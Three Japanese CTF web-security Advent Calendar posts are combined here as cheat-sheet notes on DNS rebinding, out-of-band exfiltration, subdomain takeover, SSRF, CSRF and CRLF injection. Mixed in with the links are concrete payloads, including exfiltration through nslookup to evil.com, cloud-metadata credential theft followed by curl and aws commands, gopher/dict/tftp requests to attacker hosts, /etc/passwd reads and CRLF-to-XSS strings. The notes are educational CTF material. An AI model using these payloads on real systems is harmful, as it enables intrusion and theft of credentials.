この記事はCTFのWebセキュリティ Advent Calendar 2021の13日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

DNS

• DNSの歴史
  • DNSの仕組みの基本を理解しよう：DNSの仕組みと運用（1） - ＠IT
    • ここが詳しい。hostsファイルから説明されている
  • インターネットを支え続ける老舗プロトコル、「DNS」30年超の歴史を振り返る【IETFトピックス2016-17】 - INTERNET Watch
    • ここも色々書いてある
• 攻撃・テク一覧
  • DNS Rebinding
  • OOB抽出
  • ドロップキャッチ
    • CTFでは使え無さそうだけど
    • 使われていた有名なドメインが手放されたときに、それをアタッカーが再取得して、有害サイトへのリダイレクトなどに使用すること
    • 例）https://twitter.com/tiketiketikeke/status/1281616549690740738
  • Subdomain Takeover
• 脆弱性
  • DNSpooqの脆弱性詳細と攻撃コード解説 - knqyf263's blog
    • dnsmasqというソフトウェアに関する7つの脆弱性をまとめたもの
• dnsからCNAMEを一括lookupしてくれるやつ
  • GitHub - melbadry9/cname: CNAME records lookup
• TLD
  • .arpa
    • ネットワークのインフラのためだけに利用されている。IPアドレスからホスト名を調べる用途などに使われる
    • in-addr.arpa : IPアドレスからホスト名を逆引きするときに使用する
      • 162.100.51.198.in-addr.arpaをDNSに問い合わせれば、可能ならホスト名が返ってくる
    • ip6.arpa : IPv6でのホスト名逆引きに使用する
• オープンリゾルバ
  • 不適切な設定などにより、インターネット上の不特定の利用者からの再帰問い合わせを受け付けてしまうDNSサーバ
  • Domains having Hidden Open Resolvers

DNS Rebinding

• できること
  • SSRFのバイパスに使える。例えば、「名前解決して127.0.0.1じゃないことを確認→実際に使用」とした場合、1回目で127.0.0.1以外を返して2回目で127.0.0.1を返せばバイパス可能
  • same origin policyを騙す
    • これもSSRFのチェックすり抜けと同様
    • 実行時の同一オリジンポリシーチェックを正しいDNSで乗り切ったあと、実際に使う2回目以降を悪意のあるものにする
    • https://blog.tokumaru.org/2007/11/dns-rebinding.html
• 資料
  • DNS Rebindingを悪用してインターネットからプライベートネットワークへの攻撃 - 忙しい人のためのサイバーセキュリティニュース
    • DNS Rebindingを一言で説明すると「DNSを使用して同一生成元ポリシーを回避する攻撃」
  • DNS Rebinding ～今日の用語特別版～ | 徳丸浩の日記
    • 徳丸さんの絵も分かりやすい
  • 資料 -　ここに色々対策が書いてある
  • DNSリバインディング対策 - Qiita
    • ここも対策？
• CTFで使えるサイト
  • Dashboard - requestrepo.com
    • DNS Recordを作ってvalueを127.0.0.1/11.11.11.11のようにすると、リクエスト毎に127.XX,11.XX,127.XX,11.XX, ...としてくれる
  • rbndr.us dns rebinding service
• 問題
  • CTFtime.org / ASIS CTF Quals 2020 / PyCrypto
  • WreckTheLine writeups Reporter
  • PDF Generator Writeup | DNS Rebinding Attack | TrollCat CTF Writeup | by Bipul Jaiswal | Feb, 2021 | Medium

OOB抽出

• 表記について
  • リアルワールドバグハンティングではOOB抽出と記載されていた
  • Web上では、OOB ExploitationやらOOB Exfiltrationやら曖昧
• 手法
  • 1. SSRFをして抜き出したい情報を掴む
  • 1. base32エンコードをしてpayloadを作る（URLは英数字しか入れられないからbase32にする）
  • 1. DNSサーバを用意する evil.com
  • 1. nslookup payload.evil.comすると、DNS解決をしに行くので、payload込みでevil.comに情報が送られて流出する
• Lab: Blind OS command injection with out-of-band data exfiltration | Web Security Academy

Subdomain Takeover

• どういった悪いことが起こるか
  • 正規のドメインにアクセスしたのに、詐欺サイトなどへ飛ばされてしまう
• 何が起きている？
  • 1. 正規のドメインにアクセス
    2. 正規のドメインであるが、既にメンテされてない古いドメイン
       • この古いドメインをDangling DNS、ぶら下がってるDNSと呼んだりする
    3. 「とあるドメインへのCNAMEレコードが残っている」
  • 1. ドメインのCNAMEにしたがって、あるドメインへ飛ばされる
    2. これがAzureとかのドメインである場合に、そのドメインを何者かが再取得できれば、正規のドメインの先がおかしなことになる
  • 1. あるドメインを攻撃者が再取得して詐欺サイトへリダイレクトさせてるようにしていれば攻撃成立
  • こうすることで…
    • ドメインは正規のものなので正規サイトのように見せることができる
    • XSS可能
• 脆弱なサイト一覧
  • ドメイン毎にSubdomain Takeoverができるかどうかが分かるようだ
  • EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
  • indianajson/can-i-take-over-dns: "Can I take over DNS?" — a list of DNS providers and how to claim (sub)domains via missing hosted zones
  • danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
• インシデント
  • Subdomain Takeoverによる詐欺サイトへの誘導についてまとめてみた - piyolog
    • 攻撃者サイト側のsitemap.xmlに大量のURLが書いてあった。なるほど。攻撃者として抜かりないな。なるほど
    • 話題になったTeamsにも言及しており、セッション奪取の1ピースとして同一ドメインがあったけれど、これを使えば行けたりするのか。なるほど。
• 参考
  • Subdomain Takeover 概観 – やっていく気持ち
  • 5 Subdomain Takeover #ProTips
  • Azure が提供するデフォルトドメイン名を狙った改ざんについて注意喚起 - しばやん雑記

tips

• ドメインを使ってフィルター回避
  • asc war games Filtration Phase. This is the Qualification phase for ASC… | by Mohamed R. Serwah | Aug, 2020 | Medium
  • 127.0.0.1を踏ませたいが、フィルタリングされている場合がある
  • この時に、適当にドメインを取って、127.0.0.1を指すようにすれば、フィルタリングを回避しつつlocalhostを強制できる
• DNSのTXTレコードに情報があるかもしれない
  • windowsならnslookup -q=txt [domain]で見れる
• example.comとexample.com.は同じドメインとして処理される（処理系によるかも。名前解決自体はどちらも同じ結果になる）
• 特殊なTLDをwhoisするときは特殊なサイトを使う必要があるっぽい（？）
  • .xyzならここ Open xINT CTF 2020 write-up - 気が向いたら書く
• TLDである.localについて
  • 2013年にできたMulticast DNSで.localが使われている
  • 余談であるが、慣例でActiveDirectoryでは.localドメインを内部で使用する場合に使っていたが、それと衝突するので、ADでは今後.localは使ってはいけない
    • Active Directoryのドメイン名（".local" はだめなの？）
    • Active Directoryのドメイン名に「.local」を使ってはいけない件 - asohiroblog
• レジストラが狙われた事件
  • ある日突然、自社ドメインが乗っ取られた――“原因も手口も不明”の攻撃に、セキュリティチームはどう立ち向かったか - ITmedia エンタープライズ
• digコマンド
  • 最強 dig axfr cronos.htb axfrをつけるとたどって解決してくれる
  • とりあえずこれ
    • ドメインから dig [domain] any any +multiline
    • IPから dig any any -x [ipaddress]
  • dig @[dns ip] domain q-type q-class q-opt
    • @[dns ip] option. DNSサーバを指定したい時
    • q-type option. 何を取得してくるか
      • any 全部
      • a(default), mx, ns, soa, hinfo, axfr, txt
    • q-class option. どう取ってくるか？
      • any 全部
      • in(default), hs, ch
    • q-opt
      • +trace ルートDNSから確認を行う。たくさん出てくるから読み方勉強せんなん
      • +cmd これは標準でつくっぽい
      • +dnssec DNSSECで問い合わせをする
      • +multiline これをつけると一部見やすくなる
      • +short 最小限だけ表示するので結果を使いたいときに便利
• SRVレコード
  • dig _http_._tcp.[domain] srvで検索できる
  • httpとかtcpを変えると色々見つかる
• ドメインを検索したいときにCTログが使える
  • https://crt.sh/
• IDNホモグラフアタック用ドメイン生成ツール EvilURL | うざ夫のうざブログ
  • GitHub - UndeadSec/EvilURL: Generate unicode evil domains for IDN Homograph Attack and detect them.
    • punycodeによる無茶苦茶判別しにくい見た目一緒なドメインを作るツール
  • IDNとはInternationalized Domain Name
  • 実際こういったドメインが必要なのはまれなので、社内プロキシでpunycodeは一律弾いてもいいのでは
    • xn--で始まるDNSクエリはログを記録し、モニタリングしておくのもいい

この記事はCTFのWebセキュリティ Advent Calendar 2021の11日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

• SSRF: Server Side Request Forgery
  • サーバ側の権限で任意の操作を行わせる攻撃。サーバ側に特定のURLを踏ませることで発動
  • 脆弱性が発生する場所
    • webhook
    • gitlabとかslackで例がある
      • https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/
  • 資料
    • SSRF(Server Side Request Forgery)徹底入門 | 徳丸浩の日記
    • SSRF (Server Side Request Forgery) - HackTricks
    • GitHub - jdonsec/AllThingsSSRF: This is a collection of writeups, cheatsheets, videos, books related to SSRF in one single location
    • Server Side Request Forgery - cheat-sheets
• CSRF: Cross Site Request Forgery
  • クライアント側の権限で任意の操作を行わせる攻撃。特定のユーザーに特定のURLを踏ませることで発動
  • 脆弱性が発生する場所
    • アクセスするだけで何かしらの操作が働く所全て
  • 資料
    • クロスサイト・リクエストフォージェリ(CSRF)と対策 – Webセキュリティの小部屋

SSRF

攻撃窓口

• nginx
  • https://qiita.com/no1zy_sec/items/2718f4a99bb8368ac374
  • 関連リンクにもあるが、nginxの設定によって色々な脆弱性があるっぽい
• PHPのcurl関数
  • ここの例1 https://blog.tokumaru.org/2018/12/introduction-to-ssrf-server-side-request-forgery.html
• XXE脆弱性を使ってSSRFで情報を抜き出す方法
  • ここの例2 https://blog.tokumaru.org/2018/12/introduction-to-ssrf-server-side-request-forgery.html
• Apache mod_security
  • WAF(:Web Application Firewall)
  • 設定ミスでサーバへのリクエスト結果を返すようになっていた
  • https://piyolog.hatenadiary.jp/entry/2019/08/06/062154
• ヘッドレスブラウザ
  • Puppeteerとか
  • サーバ側でヘッドレスブラウザを利用している場合にSSRFを使える場合がある
  • https://www.mbsd.jp/blog/20190605.html
• ここで色々紹介されてる。色々ある
  • https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-3-b0f5997e3739
• サーバサイドレンダリングの導入から生じるSSRF｜セキュリティブログ
  • サーバサイドからのリクエストでHostヘッダーを使うような実装が多く見られ、SSRFにつながる

狙われる情報

• クラウドの認証情報
  • AWSにおいてIAM Roleの認証情報がEC2メタデータを取得することで得られる(169.254.169.254)
    • https://docs.aws.amazon.com/ja_jp/AWSEC2/latest/UserGuide/ec2-instance-metadata.html
    • AWS CLIを使っているとサーバのローカルにデータが残っている場合もある（ディレクトリトラバーサルとかで抜かれる）
      • https://www.slideshare.net/zaki4649/pentesteraws の27ページ
    • http://169.254.169.254/latest/meta-data/hostname/
    • http://169.254.169.254/latest/meta-data/iam/security-credentials/
    • http://169.254.169.254/latest/meta-data/iam/security-credentials/rolehere
      • SSRF to fetch AWS credentials with full access to multiple services | by Zonduhackerone | Feb, 2021 | Medium { "Code" : "Success", "LastUpdated" : "2021-01-26T23:02:52Z", "Type" : "AWS-HMAC", "AccessKeyId" : "REDACTED", "SecretAccessKey" : "REDACTED", "Token" : "REDACTED==", "Expiration" : "2021-01-27T05:06:28Z" } ときたら、 export AWS_ACCESS_KEY_ID="REDACTED" export AWS_SECRET_ACCESS_KEY="REDACTED" export AWS_SESSION_TOKEN="REDACTED" として、 aws s3 ls aws ec2 describe-security-groups --region eu-west-2 aws ec2 describe-instances --region eu-west-2 aws ec2 describe-vpcs --region eu-west-2 aws ec2 describe-images --region eu-west-2 とする
  • GCE,GKE
    • PayloadsAllTheThings/README.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
    • 使えるか確認したいとき http://metadata/computeMetadata/
    • /v1beta1/はヘッダーを必要としない
      • SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例
      • 塞がれててうまく行かないときもある
    • /v1/はMetadata-Flavor: Googleというヘッダーを作る必要がある
      • urllibではヘッダーインジェクションが使える場合があり、これで無理矢理ヘッダーを埋め込む
      • http://metadata/computeMetadata/v1/instance/service-accounts/default/token HTTP/1.1\r\nMetadata-Flavor: Google\r\nGarbage:でtokenを取得する
      • http://metadata/computeMetadata/v1/project/project-id HTTP/1.1\r\nMetadata-Flavor: Google\r\nAuthorization: Bearer [TOKEN]\r\nGarbage:でトークンを使ってProjectIDを持ってくる
      • curl -H "Authorization: Bearer [TOKEN]" 'https://www.googleapis.com/storage/v1/b?project=[ProjectID]で中身を取ってくる。そこにstorageのselfLinkがある。
      • curl -H "Authorization: Bearer [TOKEN]" [selfLink]/o/でファイル一覧が出てくるので、撮って期待ファイルのmediaLinkを使ってダウンロードしてくる。
      • curl -H "Authorization: Bearer [TOKEN]" [mediaLink] --output outでoutというファイル名で取得可能
    • 問題
      • CTFtime.org / Balsn CTF 2020 / tpc
  • 注意すべきペイロードをまとめた有用まとめもある
    • https://gist.github.com/mrtc0/60ca6ba0fdfb4be0ba499c65932ab42e
• すごいまとめ A Glossary of Blind SSRF Chains – Assetnote
• 他サービス
  • Redis: Port 6379
    • https://maxchadwick.xyz/blog/ssrf-exploits-against-redis
    • https://dzmitry-savitski.github.io/2018/07/redis-ssrf-exploits-without-new-line
    • inctf://redis:6379/_set%20kiriyaaoi_isAdmin%20yes
      • InCTF 2021 writeup - st98 の日記帳 - コピー
    • Exploiting Redis Through SSRF Attack | by Muh. Fani Akbar | Oct, 2021 | InfoSec Write-ups
  • HashiCorp Consul: Port 8500
    • https://www.kernelpicnic.net/2017/05/29/Pivoting-from-blind-SSRF-to-RCE-with-Hashicorp-Consul.html
  • In case of Response based XXE, we can use unauthenticated DB API calls such as Couch DB API, Mongo DB.
    • https://www.netsparker.com/blog/web-security/exploiting-csrf-vulnerability-mongodb-rest-api/
    • https://hackerone.com/reports/398641
  • Memcached - Port 11211
    • https://medium.com/@d0znpp/ssrf-memcached-and-other-key-value-injections-in-the-wild-c8d223bd856f11211
  • Zabbix - Port 10050
    • https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit (Zabbix Agentd)
  • Solr - Port 8983
    • https://github.com/artsploit/solr-injection

テク

• ホスト名・IPアドレスのチェック
  • parse_url関数でホスト名を騙すバグがある
    • https://blog.tokumaru.org/2018/12/introduction-to-ssrf-server-side-request-forgery.html
  • ホスト名からIPアドレスをチェックするときにもいろんな問題があるので注意
    • https://blog.tokumaru.org/2018/12/introduction-to-ssrf-server-side-request-forgery.html
• ネットワーク的な保護
  • iptables、つまりファイアーウォールでアクセスさせたくない領域へのアクセスを遮断
    • IPv4 - Wikipedia
      • ここにあるようにdecimalにして送るのもある
      • e.g. http://192.0.2.235 -> http://3221226219
• Orange Tsai氏によるURLパーサへの攻撃
  • https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
• ホスト名をすり抜ける手法
  • IPアドレスを16進数にしたりUTFにしたりしてすり抜ける
    • 10進数にしてbypassする方法もある
  • https://www.corben.io/hackertarget/
  • bit.lyを噛ませる
  • xip.io: wildcard DNS for everyoneで適当にドメインを噛ませる
• そのままパスを指定して持ってくるものもあった /etc/passwd
• 相手に任意のurlリクエストを実行してほしい場合
  • 普通に作って普通に送ればいいのだが、中に+が含まれている場合は要注意。
  • URLでは+は空白とみなされるので、+が含まれる場合、%2Bにあらかじめ変換して送る必要がある。
• javascriptスキーム
  • URLチェックをしてないと、javascriptスキームが使えるかもしれない
  • CTFのXSS問題によくあるクローラが起動するタイプだと、クローラで任意のjsコードを実行させることができてしまう
  • SECCON 2020 Online CTF の write-up - st98 の日記帳
• vbscript等が代表的な脅威
• 未整理だが面白そうなもの
  • https://akaki.io/2018/smtp_domain_takeover.html
    • メーラーでのなりすまし？
• Ssrf - CTF Wiki
  • octal format
    • 0300.0250.0.1みたいな感じ
    • 127.0.0.1は0177.0.0.1となる
• localhostとかがフィルタリングされてる場合に、localhostへのリダイレクトをするようなサイトへアクセスさせるとURL的には外部サイトやけど、最終的にはlocalhostに遷移させることができるテク
  • localhostが禁止されていたら、localhostをiframeで表示するようなサイトを作ってURLを与えると、フィルターが掛かっててもlocalhostが呼ばれて表示される
    • PDF Generator Writeup | DNS Rebinding Attack | TrollCat CTF Writeup | by Bipul Jaiswal | Feb, 2021 | Medium
• SSRFチェック
  • http://localhost:22でSSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u4みたいな応答が帰ってくればSSRFされてる可能性がある
• httpsしか許容しない場合file:///etc/passwd#https://のようにハッシュを使うことでバイパスできるかも
• puppeteer経由でLFI
  • ctf/2021/angstrom_ctf/watered_down_watermark at master · qxxxb/ctf · GitHub
    • puppeteerはChromeに対してとあるremote-debugging-portを利用している
      • これをポートスキャンなどで特定することができれば、Chromeに対してwebsocketを利用することができる
      • 上の記事ではjsのfetchを使ってポートスキャンしてる
    • ポートがわかればページを発行して結果を受け取って送るようなXSSサイトを作って踏ませれば得られる
• HTMLをレンダリングしているような場合にLFIできるかも（PDF作成とか）
  • <iframedoc src="file:///etc/passwd">
  • <style>@import{ "file:///net/MYSERVER.COM/a.css"} </style>
  • <p id=x style=word-wrap:break-word;><script>x.innerHTML=document.URL;</script>
  • SSRF on PDF generator.. Hello, How are you guys doing? This is… | by John Michael Mondilla | Medium
    • <iframe/src="http://sub-domain.mydomain.com/elmah.axd">
  • リダイレクトして表示させる方法もある
    • <script>location.href = "/etc/passwd";</script>を作って踏ませる。
• SSRFを発見したら…
  • クラウドの認証情報が抜けないか探す
  • ポートスキャン
    • http://127.0.0.1:22/ -> Recv failure: Connection reset by peer
    • http://127.0.0.1:4444
• Make SSRF Great Again
  • https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf
• prerenderというjavascriptをあらかじめ実行して静的サイトに変換して返すサービスがある
  • Asian Cyber Security Challenge (ACSC) write-up - Qiita
  • <script>location.href="http://api:8000/";</script>というサイトを踏ませれば、prerenderをしてくれるサーバ上から任意のURLを踏ませることができる
    • かつ、その内容が返ってくる
• localhost系の書き方色々
  • https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-restrictions
  • https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-restrictions
  • Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
  • An exciting journey to find SSRF , Bypass Cloudflare , and extract AWS metadata ! | by hosein vita | Jun, 2021 | Medium

Blind SSRF

ポートスキャンからRCEへ

1. https://[burp-colab-url]/でBlind SSRFがあるかを確認
2. プロトコルスキャン
3. gophar://[burp-colab-url]/のようにプロトコルを変化させて、どのプロトコルが使用可能かを確認する
4. https以外認めてないことがよくあるので、最初から適当にリダイレクタをかませて確認するのがオススメ
5. dict://
   • dict://;@:/d:::
   • dict://attacker:11111/
   • dict://127.0.0.1:1337/stats
6. gopher://
7. ftp:// ftp://127.0.0.1/
8. file:// file:///etc/passwd file://\/\/etc/passwd
9. ldap:// ldap://localhost:11211/%0astats%0aquit
   • ldap://127.0.0.1:389/%0astats%0aquit
   • ldaps:とldapiもある
10. sftp:// sftp://evil.com:11111/
11. tftp:// tftp://evil.com:12346/TESTUDPPACKET
12. netdoc:///etc/passwd
13. Server-Side Request Forgery (SSRF) & the Cloud Resurgence | AppCheck
    • UNCという手もあるっぽい
14. ポートスキャン
15. gopharが使える場合は、それを使ってポートスキャン gophar://127.0.0.1:[post]/
    • ポートが開いているなら早く応答が帰り、そうでないならタイムアウトまで待って応答が返ってくる
16. デフォルトで、Memcached、Redis、Elasticsearch、MongoDBなどのサービスは認証を必要としない。攻撃者はSSRFでこれらのサービスの一部にアクセスできる
17. SMTP
    • https://twitter.com/har1sec/status/1182255952055164929
18. 攻撃する
19. gopharであれば、ポートによってはリバースシェルを仕込める
    • これはgopherはURLの形をとっているが、自由にHTTPリクエストを送信することができるので、色々できてしまう
      • gopher://<host>:<port>/<gopher-path>とやると、host:portにパケットを送れる
      • gopher://localhost:31337/1aaa%0d%0abbb%0d%0acccとやると、localhost:31337に対して、aaa%0d%0abbb%0d%0acccが送れる
      • gopher://localhost:5000/+GET%20/%20HTTP/1.1%0d%0aHost:%20localhost:5000%0d%0a%0d%0aとすれば、localhost:5000へHTTPリクエストを送信可能
    • tarunkant/Gopherus: This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
    • MySQL (Port-3306)
    • PostgreSQL(Port-5432)
    • FastCGI (Port-9000)
    • Memcached (Port-11211) If stored data is getting De-serialized by:

      * Python
      * Ruby
      * PHP
      

    • Redis (Port-6379)
      • gopher://redis:6379/+GET%20FLAG%0d%0aQUIT%0d%0aとすればFLAGをキーとする値が取れる
    • Zabbix (Port-10050)
    • SMTP (Port-25)
    • Jira (default port-8080)
      • http://jira.company.internal:8080/plugins/servlet/oauth/users/icon-uri?consumerUri=[ssrf-url]
    • Confluence (default port-8090)
      • http://confluence.company.internal:8090/plugins/servlet/oauth/users/icon-uri?consumerUri=[ssrf-url]
20. assetnote/blind-ssrf-chains: An exhaustive list of all the possible ways you can chain your Blind SSRF vulnerability

とても参考になる攻撃例

From blind XXE to root-level file read access – Honoki

いろんな要素を組み合わせてRCEにつなげている。

• XMLが出力されているエンドポイントではGETをPOSTに変えてxml入力ができるかも
• XMLが入力できたらSSRFを試してみる
• もし外部ネットワークへの接続ができない場合でも、SSRF脆弱性のある内部で動いているアプリケーションを経由すると接続できるかも

CSRF

• CSRFトークン発行APIがキャッシュされていたら同じURLを踏むことでCSRFトークンが流出するかも
  • CTFtime.org / SECCON 2020 Online CTF / Milk
  • レースコンディションで使われる前に使っちゃう手もある
• CSRFトークンが複数箇所で使用されている場合
  • ある場所で発行されたCSRFトークンがすべての場所で共有されている可能性
    • 地点Aで発行されて
• トークンは使用後にexpireすること
• OAuthでもCSRFトークンが使われる
• CSRFトークンは128bits以上のエントロピーのものを使うこと
  • OAuth2.0ではRFCに明記されてる
  • StachExchangeによると、de-facto standardという記事がある
  • Mitre CWE-6のPotential Mitigationsに記載がある
• CSRFトークンが別のアカウントで作ったものが他でも使えてしまう
• CSRFトークンを消したらなぜか動かないか？
• CSRFトークンをデコードしてみよう
• CSRFトークンが実は静的
• HTML Injectionで抜き出す
• CTF
  • CTFtime.org / redpwnCTF 2020 / cookie-recipes-v2
  • CTFtime.org / SECCON 2020 Online CTF / Milk

この記事はCTFのWebセキュリティ Advent Calendar 2021の9日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

CRLF Injection

• ヘッダーインジェクション
  • Referer偽装
  • 任意Cookie要請（Session Fixation）
  • 任意のリクエスト作成
  • キャッシュポイゾニングの1ピースにもなったりする
• Rails周辺におけるHTTPヘッダインジェクション脆弱性の動向 - YouTube
  • 昔のphpだとheader("Location: $url");みたいに書いてると脆弱
  • rubyだとresponse.set_header('x-id', "1\rSet-Cookie: foo=bar")のように\rを使えばできる
  • %0d%0aStatus:+500+NG%0d%0a%0d%0a%0d%0ascript%3Ealert(1)%3C\script%3Eのようにすると、apacheだと応答のstatusコードが書き換えられて出力され、リダイレクト応答から一般応答になり、htmlコードが入っているのでXSS発現する
• %E5%98%8Aで実現できないか
  • CRLF injection on Twitter or why blacklists fail

事例

• Get /forgotpassword/%0d%0aSet-Cookie: crlf-injection=fauzan HTTP 1.1で任意Cookieセット可能
• #1102780 bypassing dashboard without account + Information disclosure trough websockets
  • これもGET #password_reset/%0d%0aSet-Cookie:%20crlf-injection=mickey。あれか？nginxのinjectionか？
• The beauty of chaining client-side bugs | by Master SEC | May, 2021 | Medium
  • https://redacted.redacted.com/robot.txtasd%0dSet-Cookie:foo%3dbar一緒っぽいですね

payloads

• なぜかよく見かける直下からCRLF
  • curl -s -L -I "http://subdomain.example/%0aSet-Cookie:crlf=injection;domain=example.com" -c cookie-monster
• CRLFからXSSへ
  • %0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e